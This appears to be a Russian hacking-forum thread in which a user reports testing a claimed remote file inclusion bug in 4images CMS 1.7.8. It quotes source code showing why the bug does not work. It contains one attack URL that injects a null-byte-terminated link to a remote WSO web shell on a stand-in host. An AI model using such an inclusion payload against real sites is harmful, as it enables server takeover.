
14.09.2010, 17:05
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме: 11338585
Репутация:
441
|
|
Сообщение от mr.celt
mr.celt said:
Сегодня покопался на inj3ct0r.com и меня заинтересовал этот пост
link
Решил потестить на локальной машине. Скачал CMSку (1.7.8) с официального сайта, развернул и настроил как в мане написано.
Попробовал заюзать описанную уязвимость так
http://4images.local/global.php?db_servertype=http://shell.local/wso.txt%00
4images.local и shell.local - локальные домены.
Кроме надписи "Security violation" ничего не увидел.
Кто-нибудь тестил у себя? После просмотра исходника сложилось впечатление, что глобальный инъект невозможен, но может че-то сам не доганяю.
В самом начале
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (![/COLOR][COLOR="#0000BB"]defined[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ROOT_PATH'[/COLOR][COLOR="#007700"])) {
die([/COLOR][COLOR="#DD0000"]"Security violation"[/COLOR][COLOR="#007700"]);
}
[/COLOR][/COLOR]
Константа не определена это раз
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]81 $db_servertype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"mysql"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]384[/COLOR][COLOR="#007700"]include_once([/COLOR][COLOR="#0000BB"]ROOT_PATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'includes/db_'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$db_servertype[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Переменная $db_servertype определена ..никаких инжектов нету.
а иньектор это команда плагиаторов-дебилойдов которые любят подобное гавно постить чтобы свой говно сайт в гугле поднять
|
|
|